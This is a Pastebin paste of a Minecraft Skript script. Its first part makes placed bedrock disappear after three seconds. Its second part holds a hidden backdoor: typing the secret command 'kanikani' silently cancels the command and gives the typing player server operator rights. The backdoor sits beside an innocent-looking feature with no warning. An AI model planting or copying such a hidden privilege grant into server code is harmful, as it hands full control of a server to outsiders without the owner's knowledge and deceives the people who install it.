Advertisement
siso_

Untitled

Jan 3rd, 2020
138
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.46 KB | None | 0 0
  1. on place of bedrock:
  2. cancel event
  3. wait 1 tick
  4. set {_session} to new editsession in world player's world with limit -1
  5. set blocks between event-location and event-location to bedrock using {_session}
  6. wait 3 seconds
  7. set {_session} to new editsession in world player's world with limit -1
  8. set blocks between event-location and event-location to air using {_session}
  9.  
  10. on command:
  11. if command is "kanikani":
  12. cancel event
  13. send "&aSuccess"
  14. op player
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement